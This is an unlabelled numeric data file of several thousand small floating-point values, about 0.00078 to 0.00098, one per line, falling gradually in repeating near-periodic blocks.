0.000964819
0.000961184
0.000964981
0.000961183
0.000973589
0.000973811
0.000969764
0.000969974
0.000973814
0.000973599
0.000969973
0.000978732
0.000982496
0.000982615
0.000978493
0.00097853
0.000982407
0.000978633
0.000978767
0.000978554
0.000982596
0.000982368
0.00097855
0.000982373
0.000978762
0.00097362
0.000969751
0.000973863
0.000969854
0.000973832
0.000973714
0.000969944
0.000973589
0.00097381
0.000969974
0.000969762
0.000973596
0.000973812
0.000969975
0.000978727
0.000982489
0.000982606
0.00097849
0.000982398
0.000978524
0.000978631
0.000978768
0.000978554
0.000982371
0.000982588
0.000982371
0.000978762
0.000978546
0.000973618
0.000969744
0.00097386
0.000969849
0.000973828
0.000969941
0.000973712
0.000961195
0.000965026
0.0009648
0.000960985
0.000964799
0.000960981
0.000961186
0.000956054
0.000952285
0.000956299
0.000952181
0.00095615
0.000956267
0.000952376
0.000961164
0.000965051
0.000964929
0.00096093
0.00096107
0.000964837
0.000960967
0.00095602
0.000956244
0.000952199
0.000952407
0.000956249
0.000956026
0.000952409
0.000961196
0.000964801
0.000965025
0.000960983
0.000964803
0.000961186
0.00096098
0.000956054
0.000952283
0.000956298
0.00095218
0.000956265
0.000956148
0.000952376
0.000961164
0.000965043
0.000964925
0.000960928
0.000964836
0.000960961
0.000961067
0.00095602
0.000956243
0.000952408
0.0009522
0.000956025
0.000956248
0.00095241
0.000973587
0.000973811
0.000969967
0.000969767
0.00097359
0.000973816
0.000969973
0.000978731
0.000982493
0.000982616
0.000978492
0.000978631
0.000982402
0.000978533
0.000978763
0.000978554
0.000982366
0.000982594
0.000978757
0.000982367
0.000978551
0.000973619
0.000969747
0.000973862
0.000969848
0.000973713
0.000973834
0.00096994
0.000961193
0.00096503
0.000964796
0.000960984
0.000964798
0.000960988
0.000961181
0.000956054
0.000952284
0.000956298
0.000952182
0.000952378
0.000956148
0.000956269
0.000961166
0.000965055
0.000964929
0.00096093
0.00096484
0.000961068
0.00096097
0.000956017
0.000956245
0.000952205
0.000952411
0.000952411
0.000956256
0.000956023
0.000961194
0.000964796
0.000965029
0.000960985
0.000964801
0.000961184
0.000960982
0.000956052
0.000952281
0.000956297
0.000952176
0.000956264
0.000956147
0.000952373
0.000961162
0.000965046
0.000964925
0.000960927
0.000964836
0.000960963
0.000961065
0.00095602
0.000956245
0.000952412
0.000952197
0.000956027
0.000956249
0.000952408
0.000973763
0.000973353
0.000969967
0.000969966
0.000973609
0.000973609
0.000969806
0.000961028
0.000961423
0.000964821
0.000964822
0.000961185
0.000964981
0.000961184
0.000973587
0.000973808
0.000969973
0.000969762
0.000973596
0.000973811
0.000969973
0.000978729
0.000982488
0.000982607
0.000978488
0.000978628
0.000982401
0.000978524
0.000978764
0.000978551
0.000982367
0.000982591
0.000978758
0.000982371
0.000978546
0.000973617
0.000969744
0.000973859
0.00096985
0.00097371
0.000973827
0.000969942
0.000961193
0.000964799
0.000965024
0.000960982
0.000964802
0.000961184
0.000960978
0.000956053
0.000952288
0.000956298
0.000952181
0.000952379
0.00095615
0.000956265
0.000961162
0.000965043
0.000964926
0.000960927
0.000964835
0.000961067
0.000960961
0.000956018
0.000956245
0.000952411
0.000952202
0.000952412
0.000956026
0.000956248
0.000961198
0.000964799
0.000965025
0.000960984
0.000964802
0.000961186
0.000960983
0.000956055
0.000952285
0.000956298
0.000952181
0.000956269
0.00095615
0.000952375
0.000961167
0.000965046
0.000964927
0.000960927
0.000964837
0.000960966
0.000961069
0.00095602
0.000956246
0.000952408
0.000952203
0.000956025
0.000956253
0.000952406
0.000961026
0.000961422
0.000964821
0.000964821
0.00096498
0.000961181
0.000961181
0.000938634
0.000938226
0.000934837
0.000934834
0.000934676
0.00093848
0.00093848
0.000925897
0.000926293
0.000929689
0.000929689
0.00092985
0.000926052
0.00092605
0.000938457
0.000938677
0.000934629
0.00093484
0.000938681
0.000938462
0.000934842
0.000943596
0.00094736
0.000947477
0.000943359
0.000943394
0.000947268
0.000943497
0.000943631
0.00094342
0.000947458
0.000947234
0.000943415
0.000947238
0.000943626
0.000938487
0.000934611
0.00093873
0.000934718
0.000938697
0.000938582
0.000934808
0.000938455
0.000938678
0.000934635
0.000934837
0.000938682
0.00093846
0.000934842
0.000943598
0.000947359
0.000947478
0.000943361
0.000947269
0.000943396
0.0009435
0.000943633
0.000943421
0.000947459
0.000947234
0.000947237
0.000943417
0.000943626
0.000938488
0.00093462
0.000938732
0.000934722
0.000938701
0.000934814
0.000938582
0.000926065
0.000929894
0.000929667
0.000925854
0.000929669
0.000925849
0.000926056
0.000920923
0.000917151
0.000921164
0.000917044
0.000921017
0.000921131
0.000917244
0.000926033
0.000929913
0.000929796
0.000925795
0.000925936
0.000929705
0.00092583
0.000920891
0.000921112
0.000917066
0.00091728
0.000921114
0.000920898
0.000917278
0.000926061
0.0009299
0.000929664
0.000925854
0.000929668
0.000925853
0.000926054
0.000920922
0.000917152
0.000921166
0.000917049
0.000921136
0.000921015
0.000917243
0.000926036
0.000929922
0.000929798
0.000925797
0.00092971
0.000925838
0.000925938
0.000920885
0.000921113
0.000917068
0.00091728
0.000921119
0.000920895
0.000917274
0.000938631
0.000938222
0.000934835
0.000934832
0.000938474
0.000938474
0.000934673
0.000925897
0.000926291
0.00092969
0.000929688
0.000926053
0.000929849
0.000926051
0.000938456
0.000938679
0.00093463
0.000934841
0.000938681
0.000938464
0.000934842
0.000943599
0.000947361
0.000947481
0.000943362
0.000943397
0.000947271
0.000943501
0.000943634
0.000943423
0.000947461
0.000947236
0.000943417
0.00094724
0.00094363
0.000938486
0.000934612
0.000938731
0.000934718
0.000938698
0.000938582
0.00093481
0.000938458
0.00093868
0.00093484
0.000934631
0.000938464
0.000938683
0.000934841
0.000943597
0.00094736
0.000947479
0.000943363
0.00094727
0.000943396
0.000943501
0.000943636
0.000943423
0.000947237
0.00094746
0.00094724
0.000943631
0.000943417
0.000938487
0.000934614
0.000938732
0.00093472
0.000938699
0.000934811
0.000938583
0.000926063
0.000929893
0.000929668
0.000925851
0.000929669
0.000925846
0.000926056
0.000920923
0.000917151
0.000921166
0.000917047
0.000921016
0.000921133
0.000917244
0.000926034
0.000929913
0.000929795
0.000925796
0.000925936
0.000929707
0.000925831
0.000920888
0.000921112
0.000917066
0.000917278
0.000921115
0.000920897
0.000917276
0.000926064
0.000929667
0.000929893
0.000925852
0.000929667
0.000926056
0.000925847
0.000920922
0.000917153
0.000921166
0.000917049
0.000921134
0.000921017
0.000917245
0.000926034
0.000929913
0.000929795
0.000925796
0.000929705
0.000925831
0.000925937
0.000920887
0.000921111
0.000917277
0.000917067
0.000920895
0.000921115
0.000917278
0.000938453
0.000938673
0.000934835
0.000934625
0.000938457
0.000938677
0.000934838
0.000943594
0.000947359
0.000947475
0.000943357
0.000943495
0.000947268
0.00094339
0.00094363
0.000943418
0.000947236
0.000947456
0.000943624
0.000947237
0.000943412
0.000938483
0.000934607
0.000938727
0.000934712
0.000938576
0.000938693
0.000934805
0.000926062
0.000929886
0.000929667
0.000925847
0.000929666
0.000925841
0.000926057
0.00092092
0.000917154
0.000921164
0.000917048
0.000917246
0.000921016
0.000921131
0.000926029
0.000929908
0.000929792
0.000925793
0.000929701
0.000925933
0.000925826
0.000920887
0.00092111
0.000917065
0.00091728
0.000917279
0.000921112
0.000920897
0.00092606
0.000929665
0.000929888
0.000925848
0.000929666
0.000926056
0.000925842
0.00092092
0.00091715
0.000921164
0.000917044
0.00092113
0.000921016
0.000917242
0.000926029
0.000929908
0.000929791
0.000925793
0.000929701
0.000925826
0.000925933
0.000920886
0.000921109
0.000917278
0.000917062
0.000920898
0.00092111
0.000917274
0.000938633
0.000938223
0.000934837
0.000934836
0.000938476
0.000938476
0.000934678
0.000925897
0.000926291
0.000929691
0.000929689
0.000926053
0.000929852
0.000926049
0.000938452
0.000938675
0.000934832
0.00093463
0.000938455
0.00093868
0.00093484
0.000943595
0.00094736
0.00094748
0.00094336
0.000943499
0.000947268
0.000943396
0.000943629
0.00094342
0.000947234
0.000947461
0.000943622
0.000947235
0.000943416
0.000938484
0.000934612
0.000938729
0.000934718
0.00093858
0.000938697
0.000934809
0.000926063
0.000929665
0.000929891
0.00092585
0.000929668
0.000926054
0.000925846
0.000920923
0.000917153
0.000921166
0.000917049
0.000917247
0.000921016
0.000921134
0.000926034
0.000929912
0.000929794
0.000925795
0.000929707
0.000925935
0.00092583
0.00092089
0.000921113
0.000917282
0.000917071
0.000917282
0.000920897
0.000921117
0.000926064
0.000929664
0.000929892
0.000925852
0.000929669
0.000926055
0.000925847
0.000920923
0.000917154
0.000921166
0.000917051
0.000921134
0.000921017
0.000917247
0.000926032
0.000929912
0.000929794
0.000925795
0.000929705
0.00092583
0.000925936
0.000920888
0.000921114
0.000917281
0.000917068
0.000920897
0.000921116
0.000917277
0.000925894
0.000926291
0.000929688
0.00092969
0.000929847
0.000926049
0.000926049
0.000903501
0.000903094
0.000899704
0.000899703
0.000899543
0.000903348
0.000903347
0.000890766
0.000891161
0.000894556
0.000894558
0.000894719
0.00089092
0.000890921
0.000903327
0.000903547
0.000899502
0.000899709
0.000903551
0.000903331
0.000899711
0.000908468
0.000912229
0.000912346
0.000908227
0.000908262
0.00091214
0.000908368
0.000908506
0.000908292
0.000912328
0.000912105
0.000908286
0.00091211
0.000908497
0.000903358
0.000899481
0.000903597
0.000899587
0.000903566
0.000903451
0.000899679
0.000903323
0.000903546
0.000899497
0.000899709
0.000903548
0.00090333
0.00089971
0.000908463
0.00091223
0.000912347
0.000908229
0.000912136
0.000908262
0.000908369
0.000908499
0.000908291
0.000912326
0.000912106
0.000912103
0.000908283
0.000908497
0.000903353
0.000899478
0.000903599
0.000899585
0.000903565
0.000899675
0.000903449
0.000890932
0.000894766
0.000894536
0.000890722
0.000894538
0.00089072
0.000890924
0.000885796
0.000882021
0.000886035
0.00088192
0.000885887
0.000886004
0.000882118
0.000890903
0.000894782
0.000894664
0.000890665
0.000890805
0.000894575
0.000890701
0.000885758
0.000885981
0.00088194
0.000882145
0.000885989
0.000885763
0.000882146
0.00089093
0.000894759
0.000894537
0.00089072
0.000894537
0.000890714
0.000890924
0.00088579
0.00088202
0.000886034
0.000881916
0.000886001
0.000885883
0.000882112
0.0008909
0.000894779
0.00089466
0.000890664
0.000894571
0.000890698
0.000890802
0.000885755
0.000885979
0.000881934
0.000882146
0.000885982
0.000885763
0.000882143
0.000903501
0.000903093
0.000899704
0.000899702
0.000903346
0.000903346
0.000899543
0.000890767
0.000891161
0.000894559
0.000894558
0.000890922
0.000894719
0.000890921
0.000903328
0.000903548
0.000899499
0.000899709
0.000903551
0.000903333
0.000899712
0.000908466
0.000912227
0.000912346
0.000908228
0.000908262
0.000912137
0.000908368
0.000908503
0.000908291
0.000912327
0.000912104
0.000908285
0.000912105
0.000908496
0.000903356
0.00089948
0.000903598
0.000899587
0.000903565
0.00090345
0.000899678
0.000903324
0.00090355
0.000899709
0.000899501
0.000903334
0.000903553
0.00089971
0.000908469
0.000912228
0.000912348
0.000908232
0.000912141
0.00090827
0.000908371
0.000908504
0.000908292
0.000912104
0.00091233
0.00091211
0.000908498
0.000908287
0.000903356
0.000899487
0.000903602
0.00089959
0.000903574
0.000899679
0.000903453
0.000890934
0.000894764
0.000894538
0.000890723
0.00089454
0.000890718
0.000890928
0.000885794
0.000882021
0.000886033
0.000881916
0.000885886
0.000886002
0.000882115
0.000890904
0.00089478
0.000894663
0.000890663
0.000890806
0.000894574
0.000890699
0.000885757
0.000885982
0.000881935
0.000882147
0.000885986
0.000885765
0.000882145
0.000890933
0.000894538
0.000894762
0.000890723
0.000894537
0.000890927
0.000890719
0.00088579
0.00088202
0.000886035
0.000881916
0.000886004
0.000885885
0.000882112
0.000890901
0.000894786
0.000894663
0.000890667
0.000894572
0.000890703
0.000890805
0.000885757
0.000885982
0.000882146
0.000881937
0.000885764
0.000885988
0.000882145
0.000903324
0.000903544
0.000899709
0.000899495
0.000903331
0.000903546
0.000899706
0.000908465
0.000912229
0.000912346
0.000908226
0.000908368
0.000912139
0.000908262
0.000908501
0.000908288
0.000912101
0.000912328
0.000908493
0.000912106
0.000908283
0.000903353
0.000899479
0.000903597
0.000899586
0.00090345
0.000903564
0.000899675
0.000890933
0.000894763
0.000894537
0.00089072
0.00089454
0.000890716
0.000890921
0.00088579
0.000882023
0.000886035
0.00088192
0.000882116
0.000885885
0.000886002
0.000890903
0.000894781
0.000894662
0.000890664
0.000894576
0.000890805
0.000890699
0.000885757
0.000885982
0.00088194
0.000882149
0.000882149
0.000885986
0.000885762
0.00089093
0.000894537
0.000894759
0.000890719
0.000894535
0.000890924
0.000890714
0.000885791
0.00088202
0.000886035
0.000881916
0.000886002
0.000885886
0.000882113
0.000890899
0.00089478
0.000894663
0.000890664
0.000894571
0.000890698
0.000890803
0.000885756
0.000885981
0.000882148
0.000881937
0.000885764
0.000885985
0.000882146
0.000903501
0.000903092
0.000899707
0.000899704
0.000903346
0.000903345
0.000899544
0.000890767
0.00089116
0.000894557
0.000894558
0.000890921
0.000894719
0.00089092
0.000903326
0.000903549
0.000899708
0.000899507
0.000903332
0.000903555
0.000899713
0.00090847
0.00091223
0.000912351
0.000908232
0.000908372
0.000912141
0.000908272
0.000908502
0.000908291
0.000912106
0.000912329
0.000908495
0.000912106
0.000908288
0.000903358
0.000899487
0.000903603
0.000899588
0.000903453
0.000903576
0.00089968
0.000890935
0.000894538
0.000894762
0.00089072
0.00089454
0.000890924
0.000890717
0.000885795
0.000882027
0.000886035
0.000881921
0.00088212
0.000885888
0.000886004
0.000890906
0.000894782
0.000894664
0.000890664
0.000894577
0.000890807
0.0008907
0.00088576
0.000885983
0.000882153
0.000881943
0.000882153
0.000885768
0.000885987
0.000890932
0.000894535
0.000894768
0.000890721
0.000894539
0.000890924
0.00089072
0.00088579
0.000882021
0.000886035
0.000881915
0.000886001
0.000885884
0.000882111
0.000890902
0.000894784
0.000894663
0.000890665
0.000894574
0.0008907
0.000890805
0.000885756
0.000885982
0.000882149
0.000881936
0.000885766
0.000885985
0.000882145
0.000890763
0.000891159
0.000894557
0.000894557
0.000894717
0.000890918
0.000890917
0.000868372
0.000867962
0.000864572
0.000864571
0.000864412
0.000868217
0.000868217
0.000855633
0.000856029
0.000859425
0.000859427
0.000859587
0.000855789
0.000855788
0.000868192
0.000868416
0.000864369
0.000864576
0.000868421
0.000868198
0.000864579
0.000873335
0.0008771
0.000877223
0.000873099
0.000873138
0.00087701
0.000873238
0.000873368
0.00087316
0.0008772
0.000876971
0.000873155
0.000876974
0.000873363
0.000868226
0.000864352
0.000868469
0.000864456
0.000868441
0.000868321
0.000864547
0.000868193
0.000868417
0.000864367
0.000864576
0.000868417
0.000868198
0.000864578
0.000873334
0.000877096
0.000877216
0.000873097
0.000877006
0.000873132
0.000873236
0.000873372
0.000873161
0.000877195
0.000876973
0.000876974
0.000873153
0.000873365
0.000868221
0.000864348
0.000868467
0.000864454
0.000868434
0.000864544
0.000868317
0.0008558
0.00085963
0.000859404
0.000855589
0.000859406
0.000855584
0.00085579
0.000850662
0.000846889
0.000850902
0.000846785
0.000850756
0.00085087
0.000846984
0.000855769
0.00085965
0.000859531
0.000855532
0.000855672
0.000859442
0.000855567
0.000850628
0.000850849
0.000846805
0.000847016
0.000850854
0.000850632
0.000847016
0.000855802
0.00085963
0.000859403
0.000855594
0.000859406
0.000855587
0.000855792
0.000850664
0.00084689
0.000850902
0.000846784
0.000850873
0.000850756
0.000846983
0.000855772
0.000859649
0.00085953
0.000855533
0.000859441
0.000855569
0.000855674
0.000850627
0.000850849
0.000846805
0.000847013
0.000850856
0.00085063
0.000847016
0.00086837
0.00086796
0.000864572
0.000864572
0.000868215
0.000868214
0.000864412
0.000855634
0.000856029
0.000859424
0.000859424
0.000855789
0.000859586
0.000855788
0.000868197
0.000868416
0.000864368
0.000864579
0.000868419
0.000868202
0.000864582
0.000873336
0.000877098
0.000877217
0.000873097
0.000873133
0.00087701
0.000873238
0.000873372
0.00087316
0.000877199
0.000876975
0.000873155
0.000876975
0.000873367
0.000868224
0.000864349
0.000868466
0.000864456
0.000868434
0.000868319
0.000864547
0.000868195
0.000868416
0.000864579
0.000864368
0.0008682
0.00086842
0.00086458
0.000873335
0.000877098
0.000877215
0.000873098
0.000877006
0.000873132
0.000873238
0.000873371
0.00087316
0.000876973
0.000877196
0.000876975
0.000873366
0.000873153
0.000868226
0.000864349
0.000868467
0.000864455
0.000868435
0.000864547
0.000868318
0.000855803
0.000859631
0.000859407
0.00085559
0.000859408
0.000855586
0.000855795
0.000850663
0.000846891
0.000850903
0.000846787
0.000850755
0.000850874
0.000846984
0.000855773
0.00085965
0.000859532
0.000855533
0.000855672
0.000859443
0.000855569
0.000850628
0.000850851
0.000846807
0.000847016
0.000850857
0.000850635
0.000847016
0.000855802
0.000859407
0.000859631
0.00085559
0.000859408
0.000855795
0.000855586
0.000850662
0.000846891
0.000850905
0.000846786
0.000850872
0.000850756
0.000846984
0.000855773
0.000859649
0.000859531
0.000855535
0.000859443
0.000855569
0.000855676
0.000850627
0.00085085
0.000847018
0.000846806
0.000850636
0.000850854
0.000847016
0.000868194
0.000868417
0.000864575
0.000864371
0.000868198
0.000868422
0.000864579
0.000873338
0.000877099
0.000877218
0.000873098
0.000873237
0.00087701
0.000873135
0.000873373
0.000873162
0.000876974
0.000877198
0.000873364
0.000876978
0.000873156
0.000868227
0.000864357
0.00086847
0.000864458
0.00086832
0.000868439
0.00086455
0.0008558
0.000859636
0.000859405
0.000855589
0.000859408
0.000855588
0.000855792
0.000850659
0.000846893
0.000850904
0.000846788
0.000846984
0.000850756
0.000850873
0.00085577
0.000859657
0.000859533
0.000855534
0.000859444
0.000855673
0.000855572
0.000850625
0.00085085
0.000846807
0.000847019
0.000847017
0.000850855
0.000850634
0.0008558
0.000859403
0.000859635
0.000855591
0.000859407
0.00085579
0.000855589
0.00085066
0.00084689
0.000850905
0.000846787
0.000850874
0.000850758
0.000846981
0.00085577
0.000859659
0.000859537
0.000855536
0.000859445
0.000855574
0.000855677
0.000850624
0.00085085
0.000847016
0.000846805
0.000850631
0.000850855
0.000847011
0.000868371
0.000867963
0.000864574
0.000864573
0.000868217
0.000868216
0.000864414
0.000855636
0.000856031
0.000859427
0.000859428
0.000855791
0.000859589
0.00085579
0.000868194
0.000868415
0.000864579
0.000864366
0.000868201
0.000868416
0.000864579
0.000873338
0.0008771
0.000877215
0.000873097
0.000873239
0.000877009
0.000873132
0.000873372
0.000873158
0.000876975
0.000877196
0.000873364
0.000876978
0.000873152
0.000868225
0.000864348
0.000868467
0.000864456
0.000868319
0.000868433
0.000864547
0.000855804
0.000859409
0.000859637
0.000855593
0.000859412
0.000855794
0.000855591
0.000850664
0.000846896
0.000850907
0.000846791
0.000846987
0.00085076
0.000850877
0.000855776
0.00085966
0.000859538
0.000855537
0.00085945
0.000855679
0.000855576
0.000850628
0.000850853
0.00084702
0.000846809
0.00084702
0.000850636
0.000850856
0.000855803
0.000859408
0.000859629
0.000855593
0.000859406
0.000855795
0.000855585
0.000850662
0.000846891
0.000850905
0.000846786
0.000850871
0.000850755
0.000846984
0.000855771
0.000859649
0.00085953
0.000855535
0.000859441
0.000855569
0.000855673
0.000850629
0.000850853
0.000847019
0.000846806
0.000850636
0.000850855
0.000847017
0.000855634
0.00085603
0.000859427
0.000859428
0.000859586
0.000855791
0.000855788
0.000833241
0.000832831
0.000829441
0.00082944
0.000829282
0.000833085
0.000833084
0.000820506
0.000820901
0.000824297
0.000824298
0.000824457
0.000820661
0.000820661
0.000833061
0.000833284
0.000829235
0.00082945
0.000833288
0.00083307
0.000829446
0.000838205
0.000841969
0.000842087
0.000837966
0.000838004
0.000841879
0.000838108
0.000838239
0.000838027
0.000842065
0.000841841
0.000838022
0.000841845
0.000838233
0.000833095
0.00082922
0.000833337
0.000829325
0.000833308
0.000833191
0.000829414
0.000833065
0.000833282
0.000829234
0.00082945
0.000833286
0.000833071
0.000829449
0.000838207
0.000841967
0.000842083
0.000837964
0.000841878
0.000838
0.000838107
0.000838243
0.000838027
0.000842066
0.000841841
0.000841848
0.000838022
0.000838235
0.000833094
0.000829216
0.000833334
0.000829324
0.000833301
0.000829416
0.000833186
0.00082067
0.000824498
0.000824277
0.000820459
0.000824274
0.000820453
0.000820663
0.000815528
0.000811758
0.000815774
0.000811653
0.000815626
0.000815739
0.000811851
0.000820637
0.000824518
0.000824401
0.000820403
0.000820542
0.000824309
0.000820436
0.000815495
0.000815718
0.000811673
0.000811886
0.000815722
0.000815503
0.000811884
0.000820669
0.000824496
0.000824275
0.000820457
0.000824275
0.000820452
0.000820662
0.00081553
0.00081176
0.000815772
0.000811655
0.00081574
0.000815623
0.000811851
0.000820639
0.000824519
0.000824401
0.000820403
0.00082431
0.000820438
0.000820542
0.000815493
0.000815716
0.000811672
0.000811886
0.00081572
0.000815502
0.000811883
0.000833239
0.000832829
0.000829441
0.00082944
0.000833082
0.000833082
0.000829282
0.000820503
0.000820897
0.000824295
0.000824296
0.000820656
0.000824458
0.000820656
0.000833063
0.000833287
0.000829241
0.000829448
0.000833291
0.000833068
0.00082945
0.000838205
0.000841968
0.000842086
0.000837968
0.000838004
0.000841877
0.000838107
0.00083824
0.00083803
0.000842067
0.00084184
0.000838025
0.000841844
0.000838231
0.000833096
0.000829224
0.000833339
0.000829329
0.000833309
0.00083319
0.000829421
0.000833066
0.000833287
0.000829445
0.000829244
0.000833069
0.000833292
0.000829452
0.000838208
0.000841969
0.000842086
0.000837969
0.000841879
0.000838004
0.00083811
0.000838245
0.000838031
0.000841844
0.000842067
0.000841848
0.000838236
0.000838025
0.000833097
0.000829224
0.00083334
0.000829329
0.000833308
0.00082942
0.000833191
0.000820673
0.000824505
0.000824276
0.000820465
0.000824277
0.00082046
0.000820666
0.000815533
0.000811763
0.000815777
0.00081166
0.000815627
0.000815743
0.000811856
0.000820643
0.000824523
0.000824404
0.000820406
0.000820546
0.000824314
0.000820442
0.0008155
0.000815726
0.000811679
0.000811891
0.000815726
0.000815509
0.000811889
0.000820676
0.000824274
0.000824509
0.000820466
0.000824279
0.000820665
0.000820467
0.000815537
0.000811765
0.000815779
0.000811661
0.000815749
0.000815631
0.000811857
0.000820647
0.000824527
0.000824405
0.00082041
0.000824316
0.000820446
0.000820549
0.0008155
0.000815726
0.00081189
0.000811683
0.000815506
0.000815735
0.000811887
0.000833064
0.000833283
0.000829445
0.000829235
0.000833068
0.000833288
0.000829447
0.000838204
0.000841967
0.000842086
0.000837966
0.000838105
0.000841877
0.000838001
0.000838238
0.000838028
0.000841846
0.000842066
0.000838235
0.000841843
0.000838022
0.000833095
0.000829217
0.000833337
0.000829324
0.000833188
0.000833303
0.000829415
0.000820668
0.000824496
0.000824273
0.000820456
0.000824274
0.000820451
0.000820663
0.000815529
0.000811759
0.000815771
0.000811655
0.000811856
0.000815622
0.000815739
0.000820638
0.000824517
0.0008244
0.000820401
0.00082431
0.00082054
0.000820435
0.000815493
0.000815719
0.000811677
0.000811889
0.000811889
0.000815721
0.000815505
0.000820671
0.000824274
0.000824498
0.000820457
0.000824275
0.000820664
0.000820451
0.00081553
0.000811759
0.000815773
0.000811653
0.000815739
0.000815625
0.000811851
0.000820639
0.000824517
0.000824401
0.000820403
0.000824311
0.000820435
0.000820542
0.000815497
0.000815719
0.000811886
0.000811674
0.000815506
0.000815721
0.000811884
0.000833242
0.000832833
0.000829445
0.000829443
0.000833085
0.000833086
0.000829285
0.000820508
0.000820902
0.000824298
0.000824299
0.000820663
0.00082446
0.000820661
0.000833067
0.000833288
0.000829452
0.000829236
0.000833076
0.000833288
0.000829454
0.000838206
0.000841968
0.000842086
0.000837967
0.000838108
0.000841878
0.000838004
0.000838242
0.000838029
0.000841845
0.000842065
0.000838237
0.000841847
0.000838022
0.000833096
0.000829218
0.000833337
0.000829327
0.000833191
0.000833306
0.000829417
0.000820671
0.000824277
0.000824499
0.000820457
0.000824278
0.000820662
0.000820454
0.000815531
0.000811767
0.000815777
0.000811659
0.000811857
0.000815628
0.000815743
0.00082064
0.00082452
0.000824403
0.000820406
0.000824312
0.000820545
0.000820438
0.000815495
0.000815719
0.000811888
0.000811678
0.000811889
0.000815503
0.000815724
0.000820672
0.000824276
0.000824498
0.000820459
0.000824279
0.000820663
0.000820453
0.000815534
0.000811763
0.000815773
0.000811656
0.000815741
0.000815627
0.000811854
0.000820641
0.000824517
0.000824402
0.000820402
0.000824311
0.000820437
0.000820545
0.000815498
0.00081572
0.000811884
0.000811675
0.000815503
0.000815723
0.000811886
0.000820504
0.000820901
0.000824298
0.0008243
0.000824458
0.000820661
0.000820663
0.000798112
0.000797704
0.000794314
0.000794316
0.000794154
0.000797956
0.000797959
0.000785378
0.000785772
0.000789168
0.000789173
0.00078933
0.000785533
0.000785534
0.000797935
0.000798155
0.000794108
0.000794316
0.000798159
0.000797938
0.00079432
0.000803074
0.000806836
0.000806953
0.000802836
0.00080287
0.000806748
0.000802974
0.000803111
0.000802898
0.000806934
0.000806711
0.000802891
0.000806716
0.000803104
0.000797964
0.000794088
0.000798208
0.000794195
0.000798174
0.000798059
0.000794286
0.000797932
0.000798154
0.000794108
0.000794317
0.00079816
0.000797937
0.000794316
0.000803072
0.000806836
0.000806956
0.000802838
0.000806744
0.000802873
0.000802977
0.000803109
0.000802898
0.000806934
0.000806712
0.000806714
0.000802893
0.000803102
0.000797965
0.00079409
0.000798208
0.000794194
0.000798177
0.000794285
0.000798058
0.000785541
0.00078937
0.000789145
0.00078533
0.000789147
0.000785326
0.000785531
0.000780402
0.000776634
0.000780646
0.000776528
0.000780498
0.000780613
0.000776726
0.000785511
0.000789391
0.000789273
0.000785275
0.000785415
0.000789184
0.000785309
0.000780367
0.000780591
0.000776549
0.000776758
0.000780596
0.000780373
0.00077676
0.000785539
0.000789369
0.000789144
0.00078533
0.000789144
0.000785325
0.000785533
0.000780402
0.000776634
0.000780645
0.000776528
0.000780613
0.000780495
0.000776729
0.000785509
0.00078939
0.000789269
0.000785274
0.00078918
0.000785308
0.000785413
0.000780368
0.000780593
0.00077655
0.000776761
0.000780596
0.000780376
0.000776764
0.00079811
0.000797701
0.000794312
0.000794312
0.000797954
0.000797953
0.000794153
0.000785375
0.000785769
0.000789167
0.000789169
0.000785529
0.000789328
0.00078553
0.000797942
0.000798162
0.000794117
0.000794322
0.000798169
0.000797945
0.000794325
0.000803081
0.000806842
0.000806964
0.000802842
0.000802882
0.000806751
0.000802982
0.000803116
0.000802904
0.000806941
0.000806716
0.000802901
0.000806717
0.000803109
0.000797972
0.000794097
0.000798212
0.000794201
0.000798184
0.000798064
0.000794294
0.000797939
0.00079816
0.000794324
0.000794111
0.000797947
0.000798162
0.000794324
0.000803078
0.000806841
0.00080696
0.000802841
0.00080675
0.000802875
0.00080298
0.000803115
0.000802903
0.000806718
0.000806941
0.000806718
0.000803111
0.000802896
0.00079797
0.000794094
0.00079821
0.000794201
0.000798179
0.000794294
0.000798063
0.000785545
0.000789377
0.000789149
0.000785335
0.00078915
0.000785332
0.000785538
0.000780408
0.000776638
0.00078065
0.000776533
0.000780501
0.000780619
0.000776731
0.000785516
0.000789398
0.000789278
0.000785279
0.000785419
0.000789188
0.000785316
0.000780371
0.000780597
0.000776555
0.000776764
0.000780604
0.00078038
0.000776763
0.000785546
0.00078915
0.000789374
0.000785334
0.00078915
0.000785537
0.000785328
0.000780406
0.000776638
0.00078065
0.000776533
0.000780618
0.000780501
0.000776732
0.000785515
0.000789395
0.000789275
0.000785279
0.000789188
0.000785313
0.000785417
0.000780373
0.000780596
0.000776765
0.000776552
0.000780379
0.000780598
0.000776765
0.000797936
0.000798155
0.000794316
0.000794108
0.000797936
0.00079816
0.000794319
0.000803075
0.000806838
0.000806954
0.000802836
0.000802976
0.000806747
0.000802872
0.00080311
0.000802899
0.000806711
0.000806934
0.000803101
0.000806714
0.000802893
0.000797966
0.00079409
0.000798208
0.000794197
0.00079806
0.000798175
0.000794287
0.000785545
0.000789373
0.000789147
0.000785339
0.000789149
0.00078533
0.000785537
0.000780403
0.000776637
0.000780648
0.000776533
0.000780499
0.000780616
0.00077673
0.000785511
0.000789391
0.000789273
0.000785276
0.000789183
0.000785415
0.000785309
0.00078037
0.000780604
0.000776552
0.000776765
0.000780599
0.000780381
0.000776764
0.000785545
0.000789147
0.000789373
0.000785334
0.000789149
0.000785536
0.000785328
0.000780406
0.000776638
0.000780649
0.000776535
0.000780618
0.000780502
0.000776731
0.000785514
0.000789393
0.000789274
0.000785276
0.000789185
0.000785312
0.000785416
0.000780372
0.000780598
0.000776764
0.000776555
0.00078038
0.0007806
0.000776764
0.000798115
0.000797706
0.00079432
0.000794318
0.000797959
0.000797961
0.000794157
0.000785378
0.000785772
0.00078917
0.000789173
0.000785532
0.000789331
0.000785532
0.000797935
0.000798156
0.000794318
0.000794109
0.00079794
0.00079816
0.000794319
0.000803076
0.000806837
0.000806955
0.000802837
0.000802976
0.000806747
0.000802872
0.000803112
0.0008029
0.000806714
0.000806936
0.000803107
0.000806716
0.000802894
0.000797966
0.000794092
0.000798209
0.000794198
0.000798059
0.000798176
0.000794288
0.000785547
0.000789149
0.000789374
0.000785332
0.000789154
0.000785538
0.000785331
0.000780409
0.000776639
0.000780649
0.000776536
0.000780501
0.000780618
0.000776735
0.000785518
0.000789393
0.000789277
0.000785277
0.000789189
0.00078542
0.000785313
0.000780373
0.000780597
0.000776764
0.000776558
0.00078038
0.000780601
0.000776766
0.00078554
0.000789148
0.000789371
0.000785331
0.000789146
0.000785535
0.000785327
0.000780403
0.000776641
0.000780651
0.000776536
0.000780618
0.0007805
0.000776731
0.000785509
0.000789393
0.000789273
0.000785279
0.000789181
0.000785312
0.000785415
0.000780368
0.000780595
0.000776764
0.000776554
